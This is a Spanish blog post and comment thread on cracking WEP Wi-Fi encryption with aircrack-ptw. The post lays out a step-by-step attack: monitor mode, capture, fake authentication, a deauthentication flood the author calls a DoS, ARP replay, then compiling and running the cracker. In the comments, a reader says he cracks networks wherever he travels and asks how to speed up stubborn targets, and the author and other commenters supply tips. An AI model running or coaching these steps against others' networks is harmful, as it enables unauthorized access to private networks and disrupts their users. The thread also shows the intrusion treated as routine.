aircrack-ptw: El algoritmo más rápido de crackeando WEP

Por todos es sabido que el que cifrado WEP se crackea con mucha facilidad. Hasta ahora el mayor problema era capturar la gran cantidad de IV (vectores de inicialización). Con menos de millón y medio de paquetes iv caputurados las posibilidades de sacar la clave eran bajas, necesitando a veces incluso 8 millones o más. En la página http://www.wirelessdefence.org/Contents/Aircrack-ptw.htm encontramos las fuentes de este nuevo programa, capaz de crackear una clave WEP con tan solo 40.000 paquetes iv capturados!!! Parece increible pero os puedo decir que es totalmente cierto, lo he probado y aquí os dejo mi experiencia.

Voy a crackear mi propia red wifi (¿O creías que iba a crackear a un vecino? :P), usando este nuevo algoritmo. Para ello, voy a hacer un típico ataque en el que no hay clientes conectados y además hay que “engañar” al router para que mande paquetes ARP. Para hacer que el router envie paquetes IV primero tenemos que obtener un paquete ARP.

Comencemos.

Inicializamos el dispositivo
airmon-ng start wlan0
Y buscamos redes
airodump wlan0

1-todos-ap1

Mi wifi es la que tiene essid Casa, así que apuntamos los datos para escuchar solo a ese punto de acceso.
Canal: 11
Bssid: 00:12:17:D7:C7:A6
airodump –channel 11 –bssid 00:12:17:D7:C7:A6  -w cap mon0

2-solo-1-ap

Ya estamos escuchando únicamente a “Casa” y dejamos al programa a la espera de que “Casa” mande un paquete ARP
aireplay -3 -b 00:12:17:D7:C7:A6 mon0

3-escuchando-arp

Como no hay ningún cliente conectado vamos a intentar hacernos pasar por un falso cliente

aireplay -1 10 -a 00:12:17:D7:C7:A6 mon0

4-falsa-autenticacion

Y por último vamos a realizar un ataque de deautenticación (realmente es un ataque DoS), para intentar que el punto de acceso lance algún paquete ARP

aireplay -0 0 -a 00:12:17:D7:C7:A6 mon0

5-ataque-deautenticacion

Y si todo va bien, ahora mismo tenemos 4 terminales trabajando.

6-todo-el-conjunto

Esperamos a que el punto de acceso se digne a lanzar un paquete ARP. Puede ser rápido o tardar mucho tiempo, depende de la suerte que tengas (y de la calidad de la señal wifi y esas cosillas claro)

7-recogiendo-paquetes

Bingo!! Como se puede ver en la ventana de arriba a la derecha, se han capturado unos cuantos paquetes arp y se está devolviendo al punto de acceso. Así el router responde con un paquete con un vector de inicialización diferente cada vez. En la ventana de arriba a la izquierda, en el campo #Data vemos los paquetes con IV que se van capturando. Voy a dejar que capture unos 40.000

Mientras tanto, vamos a ir bajando y compilando el aircrack-ptw puesto que todavía no hay paquetes precompilados.

Bajamos el código fuente de aquí http://www.wirelessdefence.org/Contents/Files/aircrack-ptw-1.0.0.tar.gz
Desempaquetamos y entramos en el directorio.
Si usas debian (como es mi caso) antes instala libpcap para poder compilar el programa. También es necesario si usas ubuntu.
apt-get install libpcap0.8-dev
tar xvf aircrack-ptw-1.0.0.tar.gz
cd aircrack-ptw-1.0.0
make

Si no da error la compilación (a mi me compiló sin problemas a la primera) tenemos el progama aircrack-ptw.
Por último, ejecutamos el programa pasándole como parametro el archivo de captura generador por airodump

8-clave-crackeada

En la sexta línea (de la impresión de pantalla) se puede apreciar que solo he capturado 39.421 paquetes y aun así el programa no tardó ni 10 segundos en sacar la clave.
Y aquí una muestra de la configuración de mi router

9-comprobacion

Mira la key 1, coincide!! Funciona!! Me quito el sombrero ante los señores Erik Tews, Andrei Pychkine and Ralf-Philipp Weinmann, creadores de aircrack-ptw.
Para terminar, si eres novato en el tema del wifi siento si no te has podido enterar de mucho por mis nulas explicaciones pero mi intención era únicamente poner a prueba este programa y si eres experto espero que no te hayas caído de la silla al ver mi cochambroso ataque wep.

Hasta otra!

You may also like...

9 Responses

  1. WoRMs dice:

    Me comenta un amigo que entiende del tema que esto ya salio hace mas de medio año y que no hace falta hacer todo eso, con usar el aircrack normal y pasarle el parametro -z hace lo mismo :)

    saludos.

  2. Maxpowel dice:

    Llevas razón, ya tiene su tiempo este programa pero por diferentes motivos pensé que era nuevo, principalmente.

    Lo que veo es que en la ayuda no aparece la opción “-z” y aunque la ponga me sigue usando el otro algoritmo.

    Cambiaré un poco la entrada para evitar confundir a alguien.
    Gracias por el aviso

  3. willyaranda dice:

    Se supone que el último Aircrack del SVN lo hace automáticamente (el ataque PTW) o eso tengo entendido.

    Si no lo de -z sí funciona.

  4. JavierH dice:

    Hola!

    una cosa, que es eso de la -z? porque a ver mi problema es que viajo mucho y siempre llevo el portatil encima, asi que me dedico a ir cogiendo redes alli donde voy…

    pero hay veces que… pufff es imposible lo intento de todas maneras y no consigo segun que redes. Conoceis alguna manera de que esto no pase?! por que a veces llega a enviar 300.000 paquetes y no consigo un solo ARP! mientras que hay otras redes que con 100.000 ya lo tienes.

    No habrá algún tipo de configuración para acelerar estas redes imposibles?

    y otra cosa… para que mas utiliza aircrack… porque de hecho tiene un monton de opciones, tiene pinta de ser un buen programa, y me gustaria saber explotarlo al maximo…

    un saludo a todos y gracias!

  5. Maxpowel dice:

    Bien, lo de -z es para usar el algoritmo que se comenta en el post, que es mucho más rápido que el normal además de requerir muchos menos paquetes.

    Lo de las redes imposibles lo sufrimos todos. Depende principalmente de la punto de acceso wifi (normalmente un router con wifi). Los hay más “espabilados” y es difícil que caigan y otros más “inocentes” que enseguida te mandan vectores de inicialización válidos. Ahí también depende la experiencia de cada uno modificando los parámetros para intentar acelerarlo. No hay una regla mecánica.

    Si con aircrack te refieres solo a la aplicación aircrack-ng “sólo” consigue la clave y todos los parámetros disponibles son para acelerar el crackeo en caso conocer ciertos datos (si sabes que solo es numerica pues le dices que solo pruebe con esas,por ejemplo).

    Si te refieres a la suit aircrack pues la verdad es que sí tiene muchos usos. Yo no los conozco todos ni mucho menos pero uno muy interesante es airdecap que te permite descifrar paquetes de datos para luego examinarlos y saber que se ha estado transmitiendo.

  6. jesus dice:

    Hola buenas, soy un novato total en esto y me he descargado el aircrack ng 0 9 3 win, lo estoy probando pero ayer en toda la noche no encontro nada de las tres wifis que tengo a mi alcance,he seguido los pasos de una expli que descargue tambien como ir a test y seleccionar dos wap y despues pasword list, y elegir una red, me podria decir alguien que falla? y que es lo del parametro -z o donde lo encuentro? gracias craks

  7. slax dice:

    beeno si tiene razon solo la experiencia y la modificacion de parametros puede servir pero si tienes algun cliente conectado solo desautentificala y deinmediato mete al aircrack t seguro funciona ami si me a fincionado bien hacerle asi

  8. Jsalas dice:

    Pues bien, debí de usar el script aircrack-ptw en lugar de aircrack-ng y así he podido obtener la clave WEP en pocos segundos. Recomiendo su uso en caso de usar aircrack-ng y este tarda mucho tiempo en desencriptar la clave

  9. Maxpowel dice:

    Buenas, según me comentaron es el algoritmo que se usa ahora por defecto. El tiempo de crackeo también depende de muchos otros factores (longitud de la clave, cantidad de paquetes capturados…)

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *